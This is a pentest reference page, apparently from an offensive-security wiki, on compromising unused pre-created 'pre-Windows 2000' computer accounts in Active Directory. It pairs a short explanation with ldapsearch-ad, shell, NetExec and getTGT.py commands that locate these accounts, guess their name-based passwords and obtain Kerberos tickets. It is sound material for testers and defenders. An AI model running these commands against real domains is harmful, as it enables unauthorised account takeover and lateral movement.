Pre-Windows 2000 computers

Theory

When a new computer account is configured as "pre-Windows 2000 computer", its password is set based on its name (i.e. lowercase computer name without the trailing $). When it isn't, the password is randomly generated.

Once an authentication occurs for a pre-Windows 2000 computer, according to TrustedSec's blogpost, its password will usually need to be changed.

Practice

Finding computer accounts that have been "pre-created" (i.e. manually created in ADUC instead of automatically added when joining a machine to the domain), but have never been used can be done by filtering the UserAccountControl attribute of all computer accounts and look for the value 4128 (32|4096) (deductible via the UserAccountControl flags):

32 - PASSWD_NOTREQD
4096 - WORKSTATION_TRUST_ACCOUNT

The logonCount attribute can be filtered as well.

The ldapsearch-ad tool can be used to find such accounts. Once "pre-created" computer accounts that have not authenticated are found, they should be usable with their lowercase name set as their password. This can be tested with NetExec (Python) for instance.

powershell

# 1. find pre-created accounts that never logged on
ldapsearch-ad -l $LDAP_SERVER -d $DOMAIN -u $USERNAME -p $PASSWORD -t search -s '(&(userAccountControl=4128)(logonCount=0))' | tee results.txt

# 2. extract the sAMAccountNames of the results
cat results.txt | grep "sAMAccountName" | awk '{print $4}' | tee computers.txt

# 3. create a wordlist of passwords matching the Pre-Windows 2000 generation, based on the account names
cat results.txt | grep "sAMAccountName" | awk '{print tolower($4)}' | tr -d '$' | tee passwords.txt

# 4. bruteforce, line per line (user1:password1, user2:password2, ...)
nxc smb $DC_IP -u "computers.txt" -p "passwords.txt" --no-bruteforce

You will see the error message STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT when you have guessed the correct password for a computer account that has not been used yet. (trustedsec.com)

Testers can then change the Pre-Windows 2000 computer accounts' password (i.e. rpcchangepwd.py, kpasswd.py, etc.) in order to use it.

Alternatively, Filip Dragovic was able to authenticate using Kerberos without having to change the account's password. (source)

bash

getTGT.py $DOMAIN/$COMPUTER_NAME\$:$COMPUTER_PASSWORD

The ticket obtained can then be used with ptt.md

Resources

https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/

https://web.archive.org/web/20080205233505/http://support.microsoft.com/kb/320187

Reconnaissance

Movement

Credentials

Dumping

Bruteforcing

MITM and coerced auths

NTLM

Kerberos

Forged tickets

Delegations

DACL abuse

Netlogon

Certificate Services (AD-CS)

SCCM / MECM

Exchange services

Print Spooler Service

Schannel

Built-ins & settings

Kerberos

Certificate Services (AD-CS)

HTTP security headers

Identity and Access Management

File inclusion

LFI to RCE

Initial access (protocols)

Windows

UNIX-like

(AV) Anti-Virus

Mifare Classic

Android

Pre-Windows 2000 computers

Theory

Practice

Resources

Dumping

Bruteforcing

MITM and coerced auths

NTLM

Kerberos

Forged tickets

Delegations

DACL abuse

Certificate Services (AD-CS)

SCCM / MECM

Certificate Services (AD-CS)

HTTP security headers

File inclusion

LFI to RCE

Windows

UNIX-like

Mifare Classic

Pre-Windows 2000 computers ​

Theory ​

Practice ​

Resources ​

Pre-Windows 2000 computers

Theory

Practice

Resources